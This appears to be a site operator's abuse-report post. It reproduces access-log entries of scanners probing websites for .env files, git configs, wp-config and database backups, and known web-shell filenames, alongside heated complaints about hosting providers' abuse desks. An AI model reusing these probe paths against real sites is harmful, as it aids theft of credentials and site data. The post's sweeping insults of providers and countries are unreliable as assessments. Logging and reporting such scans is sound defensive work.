146.103.126.105 website*x.com – – [06/Sep/2025:07:05:59 +0200] „GET /wp-content/uploads/2022/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:05:59 +0200] „GET /wp-content/uploads/2021/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:00 +0200] „GET /wp-content/themes/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:00 +0200] „GET /wp-content/themes/twentytwentythree/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:00 +0200] „GET /wp-content/themes/twentytwentytwo/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:01 +0200] „GET /wp-content/themes/astra/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:02 +0200] „GET /wp-content/themes/hello-elementor/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:02 +0200] „GET /wp-content/themes/oceanwp/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:03 +0200] „GET /wp-content/themes/neve/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:04 +0200] „GET /wp-content/themes/divi/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:04 +0200] „GET /wp-content/plugins/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:04 +0200] „GET /wp-content/plugins/contact-form-7/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:04 +0200] „GET /wp-content/plugins/woocommerce/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:05 +0200] „GET /wp-content/plugins/elementor/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:06 +0200] „GET /wp-content/plugins/wpforms-lite/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:06 +0200] „GET /wp-content/plugins/updraftplus/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:07 +0200] „GET /wp-content/plugins/wordfence/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“
146.103.126.105 website*x.com – – [06/Sep/2025:07:06:07 +0200] „GET /.well-known/ HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36“

MAIL NR. 2 SATURDAY!

abuse@hostglobal.plus,

AS202306 – HOSTGLOBAL.PLUS LTD – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostglobal.plus – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
78.153.140.222 www.website*x.com – – [06/Sep/2025:05:02:47 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; CrOS armv7l 7262.57.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.98 Safari/537.36“
78.153.140.222 www.website*x.com – – [06/Sep/2025:05:02:47 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:40.0) Gecko/20100101 Firefox/40.0“
78.153.140.222 www.website*x.com – – [06/Sep/2025:05:02:48 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2657.0 Safari/537.36 OPR/37.0.2171.0 (Edition developer)“
78.153.140.222 www.website*x.com – – [06/Sep/2025:05:02:48 +0200] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5“
78.153.140.222 www.website*x.com – – [06/Sep/2025:05:02:50 +0200] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4“
78.153.140.222 www.website*x.com – – [06/Sep/2025:05:02:50 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1) Gecko/20090624 Firefox/3.5“
78.153.140.222 www.website*x.com – – [06/Sep/2025:05:02:51 +0200] „GET /phpinfo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 4.4.2; ALCATEL A564C Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.122 Mobile Safari/537.36“
78.153.140.222 www.website*x.com – – [06/Sep/2025:05:02:52 +0200] „GET /dev/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.20) Gecko/20110803 AskTbFWV5/3.13.0.17701 Firefox/3.6.20 ( .NET CLR 3.5.30729)“
78.153.140.222 www.website*x.com – – [06/Sep/2025:05:02:52 +0200] „GET /app_dev.php/_profiler/phpinfo HTTP/1.0“ 302 – „-“ „Opera/9.80 (Linux mips; ) Presto/2.12.407 Version/12.51 MB97/0.0.39.18 (TOSHIBA, Mxl661L32, wireless) VSTVB_MB97 SmartTvA/3.0.0“

MAIL NR. 3 SATURDAY!

abuse@amazonaws.com, trustandsafety@support.aws.com,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse@cheapy.host,abuse@fortis.host

AS14618 – Amazon.com, Inc. – HERE WITH 2 IP´S! – VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
trustandsafety@support.aws.com – ALWAYS ANSWERED ABOUT OUR ABUSE EMAILS! THIS IS VERY GOOD!
3.222.190.107 www.website*x.com – – [06/Sep/2025:02:15:11 +0200] „GET /value/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36“
+
54.144.214.30 www.website*x.com – – [06/Sep/2025:02:17:50 +0200] „GET /value/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15“

AS41745 – Baykov Ilya Sergeevich – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@fortis.host – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.89.63.55 website*x.com – – [06/Sep/2025:14:32:23 +0200] „HEAD /admin HTTP/1.0“ 403 – „-“ „Mozilla/5.0“
45.89.63.55 website*x.com – – [06/Sep/2025:14:32:23 +0200] „GET /admin HTTP/1.0“ 403 – „-“ „Mozilla/5.0“
45.89.63.55 website*x.com – – [06/Sep/2025:14:32:26 +0200] „HEAD /downloader HTTP/1.0“ 403 – „-“ „Mozilla/5.0“
45.89.63.55 website*x.com – – [06/Sep/2025:14:32:26 +0200] „GET /downloader HTTP/1.0“ 403 – „-“ „Mozilla/5.0“

MAIL NR. 4 SATURDAY!

abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,google-cloud-compliance@google.com, network-abuse@google.com,abuse@cheapy.host

AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S! – Here are we have a 403 but when it´s a 200, this idiots start to try to hacking!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
35.240.87.106 website*x.de – – [06/Sep/2025:06:21:42 +0200] „GET / HTTP/1.0“ 403 – „-“ „python-requests/2.32.4“
35.233.68.216 website*x.de – – [06/Sep/2025:06:21:42 +0200] „GET / HTTP/1.0“ 403 – „-“ „python-requests/2.32.4“

MAIL NR. 5 SATURDAY!

info@scpl.pk,hello@scpl.pk,abuse@dfri.net,tor-abuse@digitalcourage.de,abuse@f3netze.de

AS135661 – Superior Connections private limited – VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@scpl.pk – IS NOW ANSWERED, AFTER OUR POSTING HERE!
103.62.235.29 website*x.com – – [06/Sep/2025:05:10:57 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.25“
103.62.235.29 website*x.com – – [06/Sep/2025:05:10:57 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)“
103.62.235.29 website*x.com – – [06/Sep/2025:05:10:57 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.3085.475“
103.62.235.29 website*x.com – – [06/Sep/2025:05:10:57 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15“

AS198093 – Foreningen for digitala fri- och rattigheter – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@dfri.net
2001:67c:289c:4::79 website*x.com – – [06/Sep/2025:05:22:33 +0200] „GET /wp-config.zip HTTP/1.0“ 302 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“

AS60729 – Stiftung Erneuerbare Freiheit – HERE WITH 2 IP´S! – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
TOR-EXIT S H I T IS ALWAYS COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS THERE!!!
tor-abuse@digitalcourage.de – RESPONSES FROM TOR-EXIT PROVIDER TO OUR ABUSE EMAIL ABSOLUTELY USELESS!
2a0b:f4c2:4::104 website*x.com – – [06/Sep/2025:05:22:37 +0200] „GET /db-config.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2:4::104 website*x.com – – [06/Sep/2025:05:22:38 +0200] „GET /wp-config.php.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2:4::104 website*x.com – – [06/Sep/2025:05:22:39 +0200] „GET /wp-config-backup.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
+
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:45 +0200] „GET /config.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:46 +0200] „GET /database.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:48 +0200] „GET /installer-data.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:48 +0200] „GET /mysql.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:48 +0200] „GET /db.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:49 +0200] „GET /wordpress.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:50 +0200] „GET /backup.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:51 +0200] „GET /backups.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:52 +0200] „GET /wp.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:52 +0200] „GET /daily.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:53 +0200] „GET /database-sql.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“
2a0b:f4c2::12 website*x.com – – [06/Sep/2025:05:22:54 +0200] „GET /dump.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“

AS205100 – F3 Netze e.V. – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
TOR-EXIT S H I T IS ALWAYS COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS THERE!!!
abuse@f3netze.de – RESPONSES FROM TOR-EXIT PROVIDER TO OUR ABUSE EMAIL ABSOLUTELY USELESS!
2a0b:f4c0:16c:6::1 website*x.com – – [06/Sep/2025:05:22:55 +0200] „GET /site.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“

MAIL NR. 6 SATURDAY!

abuse@netcup.de,abuse@cheapy.host,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com

AS197540 – netcup GmbH – VERY IGNORANT AND UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@netcup.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2a03:4000:1d:3d:1827:b1ff:feec:f6b0 website*x.com – – [06/Sep/2025:05:22:56 +0200] „GET /archive.zip HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)“

AS401120 – cheapy.host LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cheapy.host – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
196.251.88.140 website*x.com – – [06/Sep/2025:07:17:13 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.88.140 website*x.com – – [06/Sep/2025:07:17:29 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
+
196.251.88.140 website*x.com – – [06/Sep/2025:13:36:24 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.88.140 website*x.com – – [06/Sep/2025:13:36:40 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

MAIL NR. 7 SATURDAY!

rebootyes@gmail.com,report@abuseradar.com,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com

AS133201 – ABCDE GROUP – CHINA IS COMPLETE UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
rebootyes@gmail.com
202.61.84.200 www.website*x.de – – [06/Sep/2025:02:19:57 +0200] „GET /baker.php/ HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0“

AS153656 – OWGELS INTERNATIONAL CO., LIMITED – CHINA IS COMPLETE UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S!
report@abuseradar.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
155.117.98.42 www.website*x.de – – [06/Sep/2025:02:30:26 +0200] „GET /1234.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0“
+
103.163.208.61 www.website*x.de – – [06/Sep/2025:02:32:34 +0200] „GET /login.php?s=Admin/login HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0“

AS8075 – Microsoft Corporation – HERE WITH 3 IP´S! – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
52.169.141.112 website*x.de – – [06/Sep/2025:02:57:25 +0200] „GET /.alf.php HTTP/1.0“ 403 – „-“ „-“
52.169.141.112 website*x.de – – [06/Sep/2025:02:57:25 +0200] „GET /.bod/.ll/ss.php HTTP/1.0“ 403 – „-“ „-“
52.169.141.112 website*x.de – – [06/Sep/2025:02:57:25 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
+
52.187.183.88 website*x.de – – [06/Sep/2025:09:19:32 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.183.88 website*x.de – – [06/Sep/2025:09:19:32 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.183.88 website*x.de – – [06/Sep/2025:09:19:32 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.183.88 website*x.de – – [06/Sep/2025:09:19:33 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.183.88 website*x.de – – [06/Sep/2025:09:19:33 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.183.88 website*x.de – – [06/Sep/2025:09:19:33 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.183.88 website*x.de – – [06/Sep/2025:09:19:33 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.183.88 website*x.de – – [06/Sep/2025:09:19:34 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.183.88 website*x.de – – [06/Sep/2025:09:19:34 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
52.187.183.88 website*x.de – – [06/Sep/2025:09:19:34 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
+
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:44 +0200] „GET /dropdown.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:45 +0200] „GET /makeasmtp.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:45 +0200] „GET /wp-sigunq.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:45 +0200] „GET /wso112233.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:45 +0200] „GET /alfanew.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:45 +0200] „GET /fw.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:46 +0200] „GET /install.php HTTP/1.0“ 403 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:46 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:46 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:46 +0200] „GET /simple.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:46 +0200] „GET /inputs.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:46 +0200] „GET /classsmtps.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:46 +0200] „GET /wp-blog-header.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:47 +0200] „GET /wp-trackback.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:47 +0200] „GET /wp-signup.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:47 +0200] „GET /wp-comments-post.php HTTP/1.0“ 302 – „-“ „-“
52.178.146.4 website*x.de – – [06/Sep/2025:12:32:47 +0200] „GET /wp-cron.php HTTP/1.0“ 302 – „-“ „-“
